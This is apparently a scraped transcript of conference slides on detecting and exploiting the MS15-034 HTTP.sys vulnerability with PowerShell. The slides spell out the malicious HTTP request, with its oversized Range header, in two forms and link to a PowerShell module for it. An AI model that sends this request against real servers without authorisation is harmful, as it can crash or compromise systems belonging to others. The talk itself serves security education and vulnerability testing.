exploiting ms15-034 in powershell
TRANSCRIPT
![Page 1: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/1.jpg)
EXPLOITING MS15-034 IN POWERSHELL
KIERAN JACOBSENTECHNICAL LEAD - READIFY
@KJACOBSEN – POSHSECURITY.COM
![Page 2: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/2.jpg)
‘REMOTE CODE EXECUTION’ -IN HTTP.SYS
![Page 3: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/3.jpg)
IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX
ANYMORE.
![Page 4: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/4.jpg)
HTTP.SYS IS EVERYWHERE
![Page 5: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/5.jpg)
IIS KERNEL CACHING MODULE
![Page 6: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/6.jpg)
![Page 7: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/7.jpg)
ARE WE VULNERABLE?
![Page 8: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/8.jpg)
REQUEST -> RESPONSE
![Page 9: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/9.jpg)
GET / HTTP/1.1HOST: GOOGLE.COMRANGE: BYTES=0-18446744073709551615CONNECTION: CLOSE
![Page 10: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/10.jpg)
GET / HTTP/1.1`R`NHOST: GOOGLE.COM`R`NRANGE: BYTES=0-18446744073709551615`R`NCONNECTION: CLOSE `R`N`R`N
![Page 11: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/11.jpg)
STREAMS
![Page 12: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/12.jpg)
WORKING WITH TCP
![Page 13: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/13.jpg)
MS15034.PSM1
![Page 14: Exploiting MS15-034 In PowerShell](https://reader035.vdocuments.us/reader035/viewer/2022062400/588667c61a28ab7d408b4f49/html5/thumbnails/14.jpg)
MORE INFORMATION
• MY WEBSITE – HTTP://POSHSECURITY.COM• TWITTER - @KJACOBSEN• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034 • MICROSOFT SECURITY BULLETIN - HTTPS://
TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX